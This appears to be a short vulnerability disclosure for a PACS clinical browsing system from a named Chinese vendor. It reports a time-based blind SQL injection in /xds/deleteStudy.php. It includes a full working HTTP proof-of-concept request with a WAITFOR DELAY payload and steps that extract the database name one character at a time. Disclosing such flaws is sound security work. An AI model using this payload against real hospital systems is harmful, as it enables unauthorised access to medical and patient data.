There is a front-end SQL injection vulnerability in the clinical browsing system of Lanwang Technology Co., Ltd.
-
Impact of vulnerabilities PACS clinical browsing system
-
Vulnerability location :/xds/deleteStudy.php
-
The login interface is as shown in the figure:http://ip:82
-
Since the SQL injection here is a time-based blind injection, the database name needs to be determined through ASSCII. The POC is as follows Here, it is judged through truncation that the first position in the database is X
POC
GET /xds/deleteStudy.php?documentUniqueId=1%27;if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1
Host: ip:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=mnir4pskp36nt4a3fh9jk6c2k4
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23
- Here, it is judged through truncation that the second digit in the database is D.
Here, it is judged through truncation that the third digit in the database is S.
Here, it is judged through truncation that the fourth digit of the database is 7
Here, it is judged by truncation that the fifth bit of the database is 0
Here, it is judged through truncation that the sixth digit in the database is T
Here, it is determined through delayed injection that the name of the database is: XDS70T